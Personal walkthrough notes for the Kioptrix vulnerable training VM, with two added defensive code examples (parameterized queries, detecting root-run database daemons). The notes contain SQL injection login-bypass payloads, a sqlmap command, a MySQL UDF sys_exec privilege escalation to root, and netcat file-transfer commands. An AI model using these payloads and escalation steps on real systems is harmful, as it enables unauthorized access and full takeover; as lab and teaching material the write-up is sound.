
VMW - Kioptrix level 1.4 UDF: running OS commands from SQL

Walkthru @ 1. http://www.gcura.tech/kioptrix-level-1-3-4/


  1. Ports: 22, 80, 139 and 445

  • OpenSSH v4.7p1
  • Port 80 with Apache 2.2.8 / PHP/5.2.4 with Suhosin-Patch
  • Samba 3.0.28a
  • Linux 2.6.9 – 2.6.33

  1. The login URL appears to be vulnerable to SQL injection: putting a single quote (') in the username and password fields changes the query.
    1. I will input john in the username field and 1' or '1'='1 in the password field. Now the SQL query will look something like this in the back end:
SELECT * FROM users where username='john' and password='1' or '1'='1'
  1. Also works if we use admin' or '1'='1 as the password.
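As an added example (not code from these notes or from the Kioptrix VM), the query shape above built by string concatenation next to the parameterized form that stops the payload; the in-memory table, user and password are constructed sample data:

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the application's users table (sample data only).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('john', 's3cret-sample')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # Same construction as the back-end query shown in the notes: user input is pasted
    # into the SQL text, so a quote in the password rewrites the WHERE clause.
    query = ("SELECT * FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    # Bound parameters: the input is sent as data and cannot alter the query structure,
    # so 1' or '1'='1 is compared literally against the stored password and fails.
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1'='1"
    print("vulnerable query   :", login_vulnerable(db, "john", payload))      # True
    print("parameterized query:", login_parameterized(db, "john", payload))  # False
```

The same applies to the PHP mysqli/PDO prepared statements a real checklogin.php would use; the SQL semantics are identical.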

  1. sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL --data="myusername=username&mypassword=password" --level=5 --risk=3 --dbs
From <http://www.gcura.tech/kioptrix-level-1-3-4/>
Didn't work for me.

  1. ps -ef | grep root : to list all the processes and keep the lines that mention root.
Note the use of the -e option to display all processes, and -f to display the full format. Another useful option is -u, which filters the processes displayed by user ID. For example, to display all the processes owned by the user root, run a command like this:
$ ps -u root -o user,pid,cpu,cmd
USER       PID   CPU CMD
root         1   -   /usr/lib/systemd/systemd --switched-root --system --deserialize 24
root         2   -   [kthreadd]
root         4   -   [kworker/0:0H]
root         6   -   [mm_percpu_wq]
root         7   -   [ksoftirqd/0]
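As an added example (not part of these notes), a small audit that parses ps output of the shape shown above and flags database daemons running as root, which is the condition the UDF step in these notes depends on; the listing it runs on is constructed, with mysqld lines added to produce a finding:

```python
# Constructed sample of `ps -u root -o user,pid,cpu,cmd` output, modelled on the
# listing in the notes; the mysqld_safe and mysqld lines are added for the demo.
SAMPLE_PS = """\
USER       PID   CPU CMD
root         1   -   /usr/lib/systemd/systemd --switched-root --system --deserialize 24
root         2   -   [kthreadd]
root       812   -   /bin/sh /usr/bin/mysqld_safe
root       944   -   /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root
root      1021   -   /usr/sbin/sshd
"""

# Daemons that should run under a dedicated service account, never as root.
# (Apache and sshd keep a root parent by design, so they are deliberately not listed.)
SHOULD_NOT_BE_ROOT = {"mysqld", "mysqld_safe", "postgres"}


def parse_ps(text):
    """Return (user, pid, cmd) tuples from `ps -o user,pid,cpu,cmd` output, skipping the header."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)  # user, pid, cpu, then the whole command line
        if len(parts) < 4:
            continue
        user, pid, _cpu, cmd = parts
        rows.append((user, int(pid), cmd))
    return rows


def daemon_name(cmd):
    """Program name of a command line; kernel threads like [kthreadd] give None."""
    tokens = cmd.split()
    if not tokens or tokens[0].startswith("["):
        return None
    prog = tokens[0]
    # mysqld_safe is started as "/bin/sh /usr/bin/mysqld_safe": look at the script, not the shell.
    if prog.rsplit("/", 1)[-1] in ("sh", "bash") and len(tokens) > 1:
        prog = tokens[1]
    return prog.rsplit("/", 1)[-1]


def find_root_daemons(text):
    """List (pid, name) for every watched daemon that is running as root."""
    return [(pid, daemon_name(cmd)) for user, pid, cmd in parse_ps(text)
            if user == "root" and daemon_name(cmd) in SHOULD_NOT_BE_ROOT]


if __name__ == "__main__":
    for pid, name in find_root_daemons(SAMPLE_PS):
        print("root-owned database daemon: pid %d (%s)" % (pid, name))
```

The server-side fix is to start mysqld under its own account (the `user` setting in the `[mysqld]` section of my.cnf), which removes the precondition for sys_exec to run as root.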

  1. I can see that MySQL is running with root privileges. Since I have ssh access to the machine, let's see if I can find the database credentials by accessing the configuration files.
What I will be attempting: since we have root access on MySQL, we can execute commands (on the operating system itself) using User Defined Functions. [I looked up these tutorials, which helped me understand MySQL UDFs: MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux, and Command execution with a MySQL UDF] or [http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html]
$ whereis lib_mysqludf_sys.so
  1. mysql> select sys_exec('usermod -a -G admin john');
  2. Using sys_exec I was able to run usermod, which added john to the admin group, and then ran sudo su to get the root shell.
  3. This PC has netcat if you need to copy the linuxprivchecker file. I couldn't wget it from Kali: it would connect to the server and not download it.
On the receiving end, run the following; it listens on port 1234 and writes whatever arrives to out.file:
$ nc -l -p 1234 > out.file
On the sending end, run:
$ nc -w 3 [destination] 1234 < out.file
